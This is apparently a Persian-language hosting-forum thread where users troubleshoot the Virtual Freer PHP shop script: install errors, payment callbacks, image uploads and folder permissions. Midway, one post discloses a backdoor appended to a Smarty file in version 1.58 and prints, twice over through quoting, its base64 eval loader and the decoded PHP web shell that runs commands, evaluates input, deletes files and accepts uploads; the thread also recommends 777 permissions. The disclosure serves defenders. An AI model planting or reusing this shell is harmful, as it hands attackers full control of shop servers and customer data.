Parse error: syntax error, unexpected '$config' (T_VARIABLE), expecting identifier (T_STRING) in E:\xampp\htdocs\virtual\install\index.php on line 256

KAVOSHGARAN
December 23rd, 2015, 12:34
مشکل در اضافه کردن محصول

با سلام من چندین وقته دارم از فریر استفاده میکنم الان یه مشکلی پیش اومده که دیگه محصول اضافه نمیشه هیچ محصولی هم در لیست ندارم اروری هم نمیده فقط صفحه رفرش میشه و هیچی محصولیم اضافه نمیشه چیکار کنم؟

pooyanf
December 24th, 2015, 15:46
امنیت فریر خیلی پایین هست..تازگی ما متوجه شدیم که یه سری از سایت ها ی فریر رو راحت بعضی ها هک میکنن و تو همون درگاهی که اون سایت کار میکنه باش اکانت میسازن و وقتی فریر رو هک کردن تو تنظیمات اکانت خودشون رو وارد میکنن و عملا از اون سایت ***ی میکنن....

کسی برای امن کردن فریر راهی سراغ داره؟؟؟؟

us12
December 24th, 2015, 16:46
امنیت فریر خیلی پایین هست..تازگی ما متوجه شدیم که یه سری از سایت ها ی فریر رو راحت بعضی ها هک میکنن و تو همون درگاهی که اون سایت کار میکنه باش اکانت میسازن و وقتی فریر رو هک کردن تو تنظیمات اکانت خودشون رو وارد میکنن و عملا از اون سایت ***ی میکنن....

کسی برای امن کردن فریر راهی سراغ داره؟؟؟؟

سعی کنید این نسخه را نصب کنید ( نیاز به پکیج بالا ندارد )

pooyanf
December 24th, 2015, 16:54

سعی کنید این نسخه را نصب کنید ( نیاز به پکیج بالا ندارد )

ممنون از شما...الان ما ورژنمون ۱.۵۸ هست....حالا با همون پکیج بالا میشه کار کرد اگه همون پکیج بالا رو نصب کنیم میشه مثله همون ۱.۵۷ که خودتون امن کردین؟؟؟یا باز هم فرق دارن؟؟

us12
December 24th, 2015, 20:08
ممنون از شما...الان ما ورژنمون ۱.۵۸ هست....حالا با همون پکیج بالا میشه کار کرد اگه همون پکیج بالا رو نصب کنیم میشه مثله همون ۱.۵۷ که خودتون امن کردین؟؟؟یا باز هم فرق دارن؟؟

از پکیج استفاده کنید .
تمامی پسورد ها را تغییر دهید . ( حتی پسورد های یوزر دیتابیس )
نام فولدر بک را تغییر دهید.

12341234
December 30th, 2015, 05:07
سلام
من مشکل آپلود نشدن عکس در قسمت دسته ها و محصولاتو دارم
یعنی اصلا هیچ عکسی با هر فرمتی آپلود نمیشه
بعد از اینکه ذخیره می زنم میگه با موفقیت ویرایش شد وقتی چیزی آپ نمیشه !
در یه تاپییک گفته بودن عکس آپلود شده نمایش داده نمیشه که باید htaccess رو تغییر بدی (مشکل من این نیست به اون تاپیک ارجاع ندین!)
لطفا دقیق راهنمایی کنین
تو همیتن تاپیک یکی گفته بودم باید آخر آدرس "/" بزاری که من اصلا منظورشو نفهمیدم (در مورد این راه حل هم توضیح بدین)
خیلی ممنون

ALI-LORD
December 31st, 2015, 23:05
با سلام. من نسخه 1.58 نصب کردم .. همه چی درست هست زمانی که پرداخت موفق انجام میشه و صفحه پایانی میاد ،،،، شناسه پرداخت نمایش داده نمیشه. مشکل از کجاست ؟ چیکار کنم ؟

mo_mohit1
December 31st, 2015, 23:18
با سلام. من نسخه 1.58 نصب کردم .. همه چی درست هست زمانی که پرداخت موفق انجام میشه و صفحه پایانی میاد ،،،، شناسه پرداخت نمایش داده نمیشه. مشکل از کجاست ؟ چیکار کنم ؟

slm
کلا 1.58 مشکل داره. فایل payment.php 1.57 رو جایگزین کنید

ALI-LORD
January 1st, 2016, 00:44
من 1.57 نصب کردم ... وقتی پرداخت تکمیل میشه و مویخاد صفحه شناسه اینارو بیاره میزنه ارور 404 !!! مشکل از کجاست ؟>

mo_mohit1
January 1st, 2016, 12:09
من 1.57 نصب کردم ... وقتی پرداخت تکمیل میشه و مویخاد صفحه شناسه اینارو بیاره میزنه ارور 404 !!! مشکل از کجاست ؟>

فایل کانفیگ شما مشکل داره و آدرس داخل آن بدرستی ست نشده است.خواستین فایل رو پ خ کنید تا بررسی کنم

refigh
January 1st, 2016, 13:06
سلام
فروشگاه ما چند ساله با فریر دایره

میخواستم راهی است تا تمامی شماره تلفن های ثبت شده مشتری رو یکجا در یک فایل بدست اورد ؟

یا حداقل بشه از طریق خود فریز بهشون اس داد ؟

MOJTABA005
January 1st, 2016, 13:24
سلام

میخواستم راهی است تا تمامی شماره تلفن های ثبت شده مشتری رو یکجا در یک فایل بدست اورد ؟

درود بله امکانش هست

us12
January 1st, 2016, 14:37
سلام

http://www.softiran.org/view-item/98/virtual-freer-pro-report.html

mo_mohit1
January 1st, 2016, 14:43
سلام

چند راه وجود داره. این راه رایگانش هست http://www.webhostingtalk.ir/showthread.php?t=77818

اینم ده تومنه http://www.webhostingtalk.ir/showthread.php?t=96142

اینم که خود سافتیران توی پست قبل گفتن که مورد اعتماد تره http://www.softiran.org/view-item/98/virtual-freer-pro-report.html

refigh
January 1st, 2016, 15:32
اسکریپت سافت ایران خروجی شماره تماس ها و ایمیل ها رو هم داره ؟؟؟
روش کار به چی صورت است ؟
همون باید وارد ادمین فریر بشیم یا ادرسش فرق میکنه ؟

MOJTABA005
January 1st, 2016, 18:40
اسکریپت سافت ایران خروجی شماره تماس ها و ایمیل ها رو هم داره ؟؟؟
روش کار به چی صورت است ؟
همون باید وارد ادمین فریر بشیم یا ادرسش فرق میکنه ؟

http://my.plus-server.ir/cart.php?a=add&pid=84

درون مدیریت میتونید این کار رو انجام بدید
نصب و راه اندازی به صورت رایگان انجام میشه

javadk
January 2nd, 2016, 22:40
Edit.

ata3929
January 4th, 2016, 09:13
سلام

دوستان یه مشکل جدید و عجیب دیدم در فریر

مشتری میاد برای خرید و خرید و انجام میده و یوزر هم بهش داده میشه ولی در قسمت پرداخت ها چک که میکنم میبینم ایمیل پرداخت کننده خالی هست

29546

کسی میدونه مشکل چی هست ؟؟؟؟؟؟

- - - Updated - - -

سلام

مشتری میاد برای خرید و خرید و انجام میده و یوزر هم بهش داده میشه ولی در قسمت پرداخت ها چک که میکنم میبینم ایمیل پرداخت کننده خالی هست

29546

دوستان کسی نمیدونه مشکل چی میتونه باشه ؟!!

us12
January 4th, 2016, 10:52
سلام

29546

- - - Updated - - -

دوستان کسی نمیدونه مشکل چی میتونه باشه ؟!!

موبایل هم خالی است ؟

فریر برای خرید نیاز به موبایل یا ایمیل دارد .

ata3929
January 4th, 2016, 11:16
موبایل هم خالی است ؟

فریر برای خرید نیاز به موبایل یا ایمیل دارد .

فیلد موبایل و از فریر خیلی وقته برداشتم و کار میکرد به درستی و هیچ مشکلی هم نداشت
مشکل اینجاس که الان بعضی ها میان خرید میکنن خرید هم به ایمیل اونها ارسال میشه ولی فریر اونو ثبت نمیکنه و مانند عکس که گذاشتم فیلد ایمیل خالی هست

ms313
January 4th, 2016, 17:19
فیلد موبایل و از فریر خیلی وقته برداشتم و کار میکرد به درستی و هیچ مشکلی هم نداشت
مشکل اینجاس که الان بعضی ها میان خرید میکنن خرید هم به ایمیل اونها ارسال میشه ولی فریر اونو ثبت نمیکنه و مانند عکس که گذاشتم فیلد ایمیل خالی هست
یه دونه دامپ تست کنید ببینید دیگه :|

ata3929
January 4th, 2016, 17:33
یه دونه دامپ تست کنید ببینید دیگه :|

متوجه نشدم دوست عزیز
منظورتون چی هست ؟!!!

ms313
January 4th, 2016, 17:34
وقتی داده ها رو می خواهید تو دیتابیس ثبت کنید بررسی کنید داده ها رو ببنید اصلا به طرف سرور ارسال میشه یا نه .

ata3929
January 4th, 2016, 17:40
وقتی داده ها رو می خواهید تو دیتابیس ثبت کنید بررسی کنید داده ها رو ببنید اصلا به طرف سرور ارسال میشه یا نه .

بررسی کردم
خرید هایی که این مشکل و دارن در دیتابیس هم ثبت نشده است

میرم دستی در دیتابیس فیلد ایمیل و وارد میکنم در داخل پنل مدیریت فریر نشون میده

eYounes
January 4th, 2016, 20:12
سلام

چند وقت پیش هنگام بررسی اسکریپت virtual freer(فروش کارت شارژ یا ...) متوجه 1 حفره در این اسکریپت شدم.

با این حفره برنامه نویس این اسکریپت به راحتی می تونه هرکاری بخواد بکنه !

مشکل از فایل virtual_freer_v1.58\include\libs\smarty\sysplugins \smarty_internal_templateparser.php هستش که انتهای این فایل این کد افزوده شده:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF 9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ ​ 0KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhY mJkZGEzOWU2JzsNCmlmKG1kNSgkX1J ​ FUVVFU1RbJ2JsYWNrJ10pPT0kYmxhY2sgb3IgJF9TRVNTSU9OW ydsb2dpbiddPT0nMScpew0KJF9TRVN ​ TSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhb CddKXtldmFsKCRfUkVRVUVTVFsnZXZ ​ hbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y 3dkKCkuRElSRUNUT1JZX1NFUEFSQVR ​ PUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc 3Vic3RyKFBIUF9PUywgMCwgMykpID0 ​ 9ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfU kVRVUVTVFsnYWQnXTsNCmlmICgkYWQ ​ pe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJ F9GSUxFU1siZmYiXSl7bW92ZV91cGx ​ vYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sI CRfRklMRVNbImZmIl1bIm5hbWUiXSk ​ 7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmI D0gcmVhZGRpcigkaHIpKXtpZihpc19 ​ kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZ i4kZi4nDQonO319Y2xvc2VkaXIoJGh ​ yKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0P ic7ZWNobyAnPGNlbnRlcj48dGV4dGF ​ yZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddK XtwYXNzdGhydSgkX0dFVFsnY21lJ10 ​ pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlY T4nLiRmb3JtLidDaGFuZ2UgRGlyIDo ​ gPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3Z CgpLiRzLic+PGlucHV0IHR5cGU9c3V ​ ibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kI EV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1 ​ jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3Vib Wl0IHZhbHVlPWVYZWN1dGU+PC9mb3J ​ tPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlP W11bHRpcGFydC9mb3JtLWRhdGE+VXB ​ sb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9Z mYgPiA8aW5wdXQgdHlwZT1oaWRkZW4 ​ gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5c GU9c3VibWl0IHZhbHVlPVNlbmQ+PC9 ​mb3JtPic7DQp9')); ?>

خوب کد رو دیکد می کنیم:

error_reporting(0);
session_start();
$black='8f758bcaecf29109e8d30eabbdda39e6';
if(md5($_REQUEST['black'])==$black or $_SESSION['login']=='1'){
$_SESSION['login']='1';
if($_REQUEST['eval']){eval($_REQUEST['eval']);}if($_REQUEST['dl']){unlink(getcwd().DIRECTORY_SEPARATOR.$_REQUEST['dl']);}
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
';}else{$lf=$lf.$f.'
';}}closedir($hr);}$form='<form action="" method=get>';echo '<center><textarea cols=90 rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'><input type=submit value=Go></form>'.$form.'Command Execute : <input name=cme size=50 value=id> <input type=submit value=eXecute></form><form action="" method=post enctype=multipart/form-data>Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'><input type=submit value=Send></form>';
}

برای رفعش تنها کافیه این تیکه کد رو حذف کنید.

منبع :‌ http://forum.iranphp.org/Thread-%D9%85%D8%B4%DA%A9%D9%84-%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C-%D8%A7%D8%B3%DA%A9%D8%B1%DB%8C%D9%BE%D8%AA-virtual-freer

ata3929
January 4th, 2016, 23:22
سلام

چند وقت پیش هنگام بررسی اسکریپت virtual freer(فروش کارت شارژ یا ...) متوجه 1 حفره در این اسکریپت شدم.

با این حفره برنامه نویس این اسکریپت به راحتی می تونه هرکاری بخواد بکنه !

مشکل از فایل virtual_freer_v1.58\include\libs\smarty\sysplugins \smarty_internal_templateparser.php هستش که انتهای این فایل این کد افزوده شده:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF 9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ ​ 0KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhY mJkZGEzOWU2JzsNCmlmKG1kNSgkX1J ​ FUVVFU1RbJ2JsYWNrJ10pPT0kYmxhY2sgb3IgJF9TRVNTSU9OW ydsb2dpbiddPT0nMScpew0KJF9TRVN ​ TSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhb CddKXtldmFsKCRfUkVRVUVTVFsnZXZ ​ hbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y 3dkKCkuRElSRUNUT1JZX1NFUEFSQVR ​ PUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc 3Vic3RyKFBIUF9PUywgMCwgMykpID0 ​ 9ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfU kVRVUVTVFsnYWQnXTsNCmlmICgkYWQ ​ pe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJ F9GSUxFU1siZmYiXSl7bW92ZV91cGx ​ vYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sI CRfRklMRVNbImZmIl1bIm5hbWUiXSk ​ 7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmI D0gcmVhZGRpcigkaHIpKXtpZihpc19 ​ kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZ i4kZi4nDQonO319Y2xvc2VkaXIoJGh ​ yKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0P ic7ZWNobyAnPGNlbnRlcj48dGV4dGF ​ yZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddK XtwYXNzdGhydSgkX0dFVFsnY21lJ10 ​ pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlY T4nLiRmb3JtLidDaGFuZ2UgRGlyIDo ​ gPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3Z CgpLiRzLic+PGlucHV0IHR5cGU9c3V ​ ibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kI EV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1 ​ jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3Vib Wl0IHZhbHVlPWVYZWN1dGU+PC9mb3J ​ tPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlP W11bHRpcGFydC9mb3JtLWRhdGE+VXB ​ sb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9Z mYgPiA8aW5wdXQgdHlwZT1oaWRkZW4 ​ gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5c GU9c3VibWl0IHZhbHVlPVNlbmQ+PC9 ​mb3JtPic7DQp9')); ?>

خوب کد رو دیکد می کنیم:

error_reporting(0);
session_start();
$black='8f758bcaecf29109e8d30eabbdda39e6';
if(md5($_REQUEST['black'])==$black or $_SESSION['login']=='1'){
$_SESSION['login']='1';
if($_REQUEST['eval']){eval($_REQUEST['eval']);}if($_REQUEST['dl']){unlink(getcwd().DIRECTORY_SEPARATOR.$_REQUEST['dl']);}
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
';}else{$lf=$lf.$f.'
';}}closedir($hr);}$form='<form action="" method=get>';echo '<center><textarea cols=90 rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'><input type=submit value=Go></form>'.$form.'Command Execute : <input name=cme size=50 value=id> <input type=submit value=eXecute></form><form action="" method=post enctype=multipart/form-data>Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'><input type=submit value=Send></form>';
}

برای رفعش تنها کافیه این تیکه کد رو حذف کنید.

منبع :‌ http://forum.iranphp.org/Thread-%D9%85%D8%B4%DA%A9%D9%84-%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C-%D8%A7%D8%B3%DA%A9%D8%B1%DB%8C%D9%BE%D8%AA-virtual-freer

من بررسی کردم
همچین چیزی نداره

eYounes
January 5th, 2016, 00:04
29558دوست عزیز بنده چک کردم همچین چیزی وجود دارد

saeedsm
January 5th, 2016, 01:16
با درود
من از اسکریپت فرییر نسخه 1.57 استفاده میکنم. از پلاگ این parspal موجود در سایت پارس پال و هم نسخه سایت فرییر استفاده کردم. در هر دو حالت پس از پرداخت موفقیت امیز و انتقال به سایت خودم با این خطا مواجه میشم
آدرس بازگشت بروزر :
http://dukandiet.biz/callback.php?gateway=parspal
خطا :
Not Found

The requested URL /callback.php?gateway=parspal was not found on this server.
dukandiet.biz
مشکل از کجاست؟#-o
متشکرم

javad159
January 5th, 2016, 02:10
با درود
من از اسکریپت فرییر نسخه 1.57 استفاده میکنم. از پلاگ این parspal موجود در سایت پارس پال و هم نسخه سایت فرییر استفاده کردم. در هر دو حالت پس از پرداخت موفقیت امیز و انتقال به سایت خودم با این خطا مواجه میشم
آدرس بازگشت بروزر :
خطا :
Not Found

dukandiet.biz
مشکل از کجاست؟#-o
متشکرم

سلام و احترام

دوست عزیز ماژول درگاه دیگری را نصب و تست بفرمایید ،در صورتی که مشکلی نداشته باشد یعنی مشکل از ماژول است

saeedsm
January 5th, 2016, 02:39
سلام و احترام

دوست عزیز ماژول درگاه دیگری را نصب و تست بفرمایید ،در صورتی که مشکلی نداشته باشد یعنی مشکل از ماژول است

سلام

همون ماژول روی ۱.۵۸ کار کرد. من از ۱.۵۷ استفاده میکردم چون ظاهرا میگن استیبل تره؟
متشکرم

javad159
January 5th, 2016, 02:46
سلام

همون ماژول روی ۱.۵۸ کار کرد. من از ۱.۵۷ استفاده میکردم چون ظاهرا میگن استیبل تره؟
متشکرم

پس مشکل از اسکریپت بوده دوست عزیز
مشکلتون حل شده ؟

us12
January 5th, 2016, 09:42
با درود
آدرس بازگشت بروزر :
خطا :
Not Found

dukandiet.biz
مشکل از کجاست؟#-o
متشکرم

آدرس سایت را در فایل کانفیگ درست کنید

فریر شما در این آدرس نصب است :

http://dukandiet.biz/fre/

kargah
January 7th, 2016, 23:41
با سلام:
لطفا یکی از دوستان میتونه مشکل منو رو برطرف کنه
آدرس سایت
www.id.tatmobile.ir (http://go.shopkeeper.ir/?url=http%3A%2F%2Fwww.id.tatmobile.ir%2F)

ms313
January 8th, 2016, 23:56
با سلام:
آدرس سایت
www.id.tatmobile.ir (http://go.shopkeeper.ir/?url=http%3A%2F%2Fwww.id.tatmobile.ir%2F)

دیتا دارید تو دیتابیس !؟
چه تغییراتی ایجاد کردین !؟

MOJTABA005
January 9th, 2016, 18:57
با سلام:
آدرس سایت

فایل index.php دیفالت را جایگزین کنید

bia2mob
January 10th, 2016, 10:17
سلام
من هم خیلی مشکلات داشتم با فریر ولی از وقتی ورژن php سرویسم رو قرار دادن روی 4 مشکلاتم حل شده و راحت جواب میده

kargah
January 10th, 2016, 12:24
دیتا دارید تو دیتابیس !؟
چه تغییراتی ایجاد کردین !؟

هیچ تغییراتی ایجاد نکردم دیتا ساختم و فایل رو اکسترکت کردم و حالا می خوام نصب کنم خطا میده

- - - Updated - - -

فایل index.php دیفالت را جایگزین کنید

فایل دیفالت هست و من هیچ دستکاری نکردم

MOJTABA005
January 10th, 2016, 19:14
هیچ تغییراتی ایجاد نکردم دیتا ساختم و فایل رو اکسترکت کردم و حالا می خوام نصب کنم خطا میده

- - - Updated - - -

فایل دیفالت هست و من هیچ دستکاری نکردم

فایل ها رو از سایت اصلی فریر دانلود کردید ؟

kargah
January 11th, 2016, 09:08
فایل ها رو از سایت اصلی فریر دانلود کردید ؟
آره چندین بار دانلود کردم

MOJTABA005
January 11th, 2016, 11:47
با بنده در ارتباط باشید
براتون نصب کنم
آیدی یاهو : info.luxserver
آدرس سایت : Plus-server.ir

unix_magnet
January 15th, 2016, 17:17
در هنگام نصب freer با پیغام خطای cannot open file مواجه میشوم

یعنی به محظ اینکه کلیک می کنم نصب بشه و sql دیتابیس رو بخونه اینو می نویسه و البته اطلاعات دیتابیس چندین بار بررسی شده دقیقا اعمال میشه

نصب نمیشه

پنل دایرکت ادمین هست
ورژن لینوکس 6.7 سنتوس
فایل ها رو از سایت اصلی فریر دانلود کردم
ورژن php 5.4

اطلاعات دیگه لازم بود بفرمایید بگم مرسی

javad159
January 15th, 2016, 18:11

یعنی به محظ اینکه کلیک می کنم نصب بشه و sql دیتابیس رو بخونه اینو می نویسه و البته اطلاعات دیتابیس چندین بار بررسی شده دقیقا اعمال میشه

نصب نمیشه

پنل دایرکت ادمین هست
ورژن لینوکس 6.7 سنتوس
ورژن php 5.4

سلام و احترام

چک کنید ببینید فایل ها درست و کامل آپلود شده اند ؟!

mo_mohit1
January 15th, 2016, 18:20

نصب نمیشه

پنل دایرکت ادمین هست
ورژن لینوکس 6.7 سنتوس
ورژن php 5.4

سلام. اول ورزن 5.3 باشه بهتره
در ضمن این خطا فقط در دایرکت ادیمن نشون داده میشه. چون سطح دسترسی چند پوشه رو باید تغییر بدی
اول تو مسیرزیر statics\upload\images\
دو پوشه resized و cache رو 777 بزار
پوشه install و فایل های داخلش هم 777 بزار
داخل پوشه templates پوشه templates_c رو هم 777 بزار درست میشه صد درصد

- - - Updated - - -

javad159
January 15th, 2016, 18:31
در ضمن این خطا فقط در دایرکت ادیمن نشون داده میشه. چون سطح دسترسی چند پوشه رو باید تغییر بدی
دو پوشه resized و cache رو 775 بزار
پوشه install و فایل های داخلش هم 775 بزار
داخل پوشه templates پوشه templates_c رو هم 775 بزار درست میشه صد درصد

- - - Updated - - -

دو پوشه resized و cache رو 775 بزار
پوشه install و فایل های داخلش هم 775 بزار
داخل پوشه templates پوشه templates_c رو هم 775 بزار درست میشه صد درصد

مشکل از دایرکت ادمین نیست دوست عزیز مشکل از کانفیگ سرور است ، بنده بر روی ورژن 5.4 در حال استفاده ام بدون کوچکترین مشکلی .مشکل از suphp می باشد که احتمالن در سرور فعال نیست .

mo_mohit1
January 15th, 2016, 18:43
مشکل از دایرکت ادمین نیست دوست عزیز مشکل از کانفیگ سرور است ، بنده بر روی ورژن 5.4 در حال استفاده ام بدون کوچکترین مشکلی .مشکل از suphp می باشد که احتمالن در سرور فعال نیست .

شما تست کنید. بنده در این تاپیک با این روش کار صد نفر.و راه انداختم/اگر با اایرکت ادمین اشنا یاشید این خطاهای پرمیشن داخلش عادی هست. با این روش که گفتم صد درصد حل مییشه/ لطفا تست کنید .و بعد نظر بدین /هیچ ربطی به بد آپلود شدن و کانفیگ سرور نداره/.

unix_magnet
January 16th, 2016, 13:34
شما تست کنید. بنده در این تاپیک با این روش کار صد نفر.و راه انداختم/اگر با اایرکت ادمین اشنا یاشید این خطاهای پرمیشن داخلش عادی هست. با این روش که گفتم صد درصد حل مییشه/ لطفا تست کنید .و بعد نظر بدین /هیچ ربطی به بد آپلود شدن و کانفیگ سرور نداره/.

مگه شده ادم با directadmin کار بکنه و این مشکل premission ها دردسر ساز نشه
تمامی پوشه ها بنا به فرمایش شما دقیقا تو همون سطح دسترسی بودن اما بنده پوشه ها رو از public_html به سطح 777 رسوندم و اوکی شد البته بعدش خوب باید کمی وقت صرف بشه بابت برگردوندن فایلها به روال سابق سطح دسترسی شون
با این حال حدس شما درست بود و بنده بابت این مسئله از شما سپاسگذاری می کنم
از دوست دیگرمون که هدفشون کمک بود هم قدردانی می کنم
ممنون و موفق باشید

- - - Updated - - -

باید اطلاعیه های روی سایت behpardakht.com را هم روی کد خود اجرا کنید تا فعال شوید. (لوگوی بهپرداخت + آدرس شاپرک + لوگوی اینماد)
قرار دادن لوگوی اینماد یا لوگوی به پرداخت ربطی به رویت درگاه بانک ندارد کاری است که توسط برنامه نویس سایت انجام شود.
باز هم اگر ابهامی هست به برنامه نویس اطلاع دهید تا با شماره 27312734 تماس بگیرد تا فنی صحبت شود.
این دقیقا منظورش چیه ؟ لوگو کجا باید قرار داده بشه دقیقا ؟ توی صفحه اصلی سایت رو می گه یا یه چیز دیگه منظورشه ؟

salaripoor
January 17th, 2016, 18:03
سلام دوستان لطفا راهنمایی کنید این ماژول لیست اکانتهای پایان یافته فریر عملکردش چطور هست به ibsng متصل میشه یا جداگونه کار می کنه ؟

kargah
January 17th, 2016, 18:55
با بنده در ارتباط باشید
براتون نصب کنم
آیدی یاهو : info.luxserver
آدرس سایت : Plus-server.ir

سلام من ایمیل زدم دوست عزیز
شماره واتس و تلگرام من
09383606541

MOJTABA005
January 18th, 2016, 22:14
سلام دوستان لطفا راهنمایی کنید این ماژول لیست اکانتهای پایان یافته فریر عملکردش چطور هست به ibsng متصل میشه یا جداگونه کار می کنه ؟

درود
بله به ibsng متصل میشه

- - - Updated - - -

سلام من ایمیل زدم دوست عزیز
شماره واتس و تلگرام من
09383606541

پاسختون ارسال شد